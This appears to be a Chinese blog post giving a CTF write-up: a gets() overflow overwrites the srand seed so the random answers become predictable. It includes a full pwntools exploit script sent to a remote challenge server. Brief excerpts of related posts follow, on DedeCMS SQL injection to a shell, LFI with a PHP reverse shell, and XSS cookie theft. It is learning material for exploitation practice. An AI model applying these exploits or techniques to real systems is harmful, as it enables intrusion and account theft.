pwn gets 漏洞的利用

2021-09-05 13:05:56 字數 1052 閱讀 3623

其實做pwn題是有一段時間了  但是因為複習以及學習驅動 所以沒有什麼時間寫部落格  然後這一次寫乙個pwn的題 

這個題 還是很簡單的 

先用ida 看一下 發現了 我們這個題 有明顯的利用漏洞 gets  然後 我們發現了  有srand 是要確定隨機種子 那麼 如果 我們 把這個種子 給覆蓋掉  那麼我們就可以 算出隨機數 直接 得到flag  

在 除錯下 發現了

然後輸入了 33個 1  發現種子(位址是00007ffc1a24e230)

成功被覆蓋成1  那麼就很好說了 

我們直接  32*a +自己想要的種子  就可以了 

寫出 exp

#coding=utf-8

from pwn import*

from ctypes import*

libc = cdll.loadlibrary("/lib/x86_64-linux-gnu/libc.so.6")

#io=process('/home/pipixia/桌面/level2' )

io=remote('111.198.29.45','32393')

p='a'*0x20+p64(0)

io.sendlineafter("name:",p)

libc.srand(0)

for i in range(10):

io.sendlineafter("number:",str(libc.rand()%6+1))

print io.recv()

print io.recv()

然後我一直不知道怎麼用python來寫rand 現在知道了 還要呼叫外部的庫。。。。

Dedecms getip 的漏洞利用

flyh4t在非安全發布了dedecms getip 的注射漏洞,漏洞本身的成因沒什麼好說的老掉牙的x forwarded for的問題,我想這個漏洞很多人都找到了,不過這個漏洞的利用有個地方還是可以說說的,可以直接得到shell 在使用者登陸後把使用者資訊寫如了快取 include inc mem...

LFI 漏洞的利用

參考鏈結1 參考鏈結2 得到指令碼後,我們需要修改指令碼中的攻擊載荷,使用命令locate php reverse定位可用的php載荷位置 lfireq get browse.php?file s我們需要定位到日誌檔案的位置,這裡以apache為例,通過google我們可以知道配置檔案一般在 usr...

xss漏洞之 漏洞利用

原理 網頁被植入網頁被植入xss指令碼,普通使用者訪問此網頁時,會自動將使用者本地的cookie快取傳送到指定遠端伺服器 利用 1 首先登陸乙個頁面,抓包獲取cookie 2 複製此頁面裡任一選項的url,重啟瀏覽器後直接訪問此url,抓包修改cookie為上面獲取的登陸成功後的cookie 3 頁...